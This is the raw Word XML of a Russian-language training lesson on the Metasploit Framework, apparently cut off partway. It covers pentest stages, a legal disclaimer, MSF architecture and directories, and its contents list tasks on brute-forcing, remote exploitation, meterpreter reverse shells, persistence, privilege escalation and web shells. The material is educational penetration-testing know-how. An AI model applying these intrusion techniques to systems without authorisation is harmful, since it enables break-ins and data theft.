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tabs>
          <w:tab w:val="left" w:pos="1444"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Кратко рассмотрим использование Metasploit Framework.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5">
          <w:pPr>
            <w:spacing w:before="80" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:color w:val="1155cc"/>
              <w:u w:val="single"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve"> TOC \h \u \z \n </w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_gjdgxs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Что такое  тестирование на проникновение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1uhp16pnqq9z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Краткий обзор Metasploit Framework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6u3gelazlj4o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Disclaimer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30j0zll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Metasploit Framework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cxcfvbht9bqf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Модули в MSF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xpix8g3p9ikt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Работа с MSF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if1l63upfoch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Обзор команд Metasploit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3zrtcfksanpc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Основные понятия msfconsole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dqavvrq22fgv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Виды shell и payload в MSF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9bq3l7urtxbr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Практическая часть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keqnvc4ihw9s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Задание 1. Провести атаку подбора параметров подключения к ftp-серверу при помощи auxiliary-модуля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2mzyp5qsdd18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Задание 2. Эксплуатация уязвимости на удаленном ПК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uv75fu1zzwm8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Задание 3. Запуск reverse-шелла на базе meterpreter и подключение к хендлеру в msfconsole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j93o5bwz8qii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Задание 4. Постэксплуатация и закрепление в системе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ihwrqz4td6tz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Задание 5. Повышение привилегий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3mjm6qevop7z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Задание 6. Веб-шелл при помощи meterpreter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cu9xx8pe6vio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Задание 7. Фаззинг параметров а MSF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921piv3ooqui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Выводы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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:color w:val="1155cc"/>
              <w:u w:val="single"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Практическое</w:t>
          </w:r>
          <w:hyperlink w:anchor="_trgraggfxaow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 задание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1fob9te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Дополнительные материалы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spacing w:after="80" w:before="200" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:color w:val="1155cc"/>
              <w:u w:val="single"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_3znysh7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Используемая литература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2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1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Что </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">такое </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> тестирование на проникновение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> эффективно оцен</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ивать </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">механизм</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ы</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> защит</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ы и</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> систем</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">у</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> безопасности в целом, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">чаще всего </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">имит</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ируют</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> действи</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">я</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> злоумышленника. Это называется Penetration test, или сокращенно — Pentest. В общем случае пентест можно разделить на следующие этапы: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Разведка</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — чтобы </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">собрать как можно больше информации о цели.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Определение уязвимостей</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — чтобы </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">определить, подвержена ли цель уязвимостям и каковы последствия от ее эксплуатации. Например, позволит ли она выполнить код на удаленной системе с правами привилегированного пользователя. Средство для эксплуатации уязвимости называют эксплоитом.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Подбор эксплоита для уязвимости</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Когда уязвимость обнаружена, для нее подбирают рабочий эксплоит. В него надо включить payload (полезную нагрузку), который будет выполнять действия, выгодные злоумышленнику. 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Доставка эксплоита жертве</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. На этом этапе выбирается приемлемый способ доставки эксплоита жертве. Если это файл, его можно отправить по почте, если поток данных — его надо запустить, чтобы он передавал эти данные уязвимому приложению.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Post-эксплуатация.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Обычно на этом этапе из атаки извлекают выгоду: закрепляются в системе, крадут данные. При пентесте на данном этапе оценивают последствия атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Типичная проблема при пентесте — интеграция этих задач. Часто для выполнения реальных атак злоумышленникам требуется много средств. Эксплоит может быть написан на Python, и его невозможно запустить на устройстве жертвы без дополнительных средств. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">С точки зрения тестирования методом пентеста важно собрать средства,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> которые используются на разных этапах тестирования</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> в единую среду — например,  модули для сканирования, эксплоиты, оболочки и другие сущности. Единая среда для таких решений должна позволить не только провести пентест, не выходя за ее пределы, но и агрегировать информацию о результатах для дальнейшего анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">На данный момент таковой средой является Metasploit Framework, структуру и работу с которым мы рассмотрим далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1uhp16pnqq9z" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Краткий обзор Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6u3gelazlj4o" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Дальнейшую</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> информацию даем только в ознакомительных целях. Проводить тестирование на проникновения без согласия на эту процедуру — противозаконно и грозит уголовной ответственностью.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_30j0zll" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework (далее MSF) — это фреймворк для автоматизации тестирования на проникновение. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Обычно </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> рассматривают как коллекцию эксплоитов, шелл-кодов, утилит для </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">фаззинга</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, пэйлоадов, энкодеров и прочих утилит.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSF предоставляет единый интерфейс для пентеста на всех его этапах. Схема основных компонентов MSF:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E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621462" cy="2220113"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="42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1462" cy="222011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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">В основе MSF три библиотеки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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REX (Ruby Extensions)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — база </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSF</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Компоненты </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">REX</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> включают подсистему сокетов (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wrapper socket subsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), реализацию клиентских и серверных протоколов, регистрацию подсистемы (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">logging subsystem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploitation utility classes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, а также ряд других полезных классов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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MSF Core</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отвечает за выполнение интерфейсов (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">required interfaces</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), которые позволяют взаимодействовать с эксплойтами, модулями, сессиями и плагинами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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MSF Base</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — упрощенные API для интеграции компонентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033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Существует две версии </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit framework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34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Metasploit framework</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это open-source проект, который чаще всего имеют в виду, когда говорят о Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Commercial-версия </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">включает Metasploit Pro, Express, Community и Nexpose Ultimate. В отличие от Metasploit framewor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">k</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, данная версия содержит web-интерфейс и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другие полезные возможности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6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework уже установлен в Kali Linux, компоненты расположены в каталоге </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/Metas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ploit-fra</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mework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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="6121400" cy="1412875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="44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412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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Кратко рассмотрим назначение основных каталогов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">содержит данные для запуска компонентов Metasploit: компоненты для эксплоитов, словари.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A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780920" cy="1355278"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="43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80920" cy="13552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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lib </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">содержит библиотеки Ruby для Metasploit, обеспечивающие работу интерфейса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C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698565" cy="1582110"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="46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8565" cy="15821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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Plugins </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">содержит плагины для интерфейса Metasploit. С их помощью можно расширять функционал фреймворка — например, подключая к нему дополнительные компоненты </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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openvas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nexpose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3E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250972" cy="1370482"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="45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0972" cy="13704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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modules </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— к</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">аталог хранения модулей, которые используются для эксплоитов (к примеру). Модули — это основа для MSF: по сути, все эксплоиты оформляются в виде модулей. Пример модуля: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638550" cy="1419225"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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419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2"/>
        <w:jc w:val="both"/>
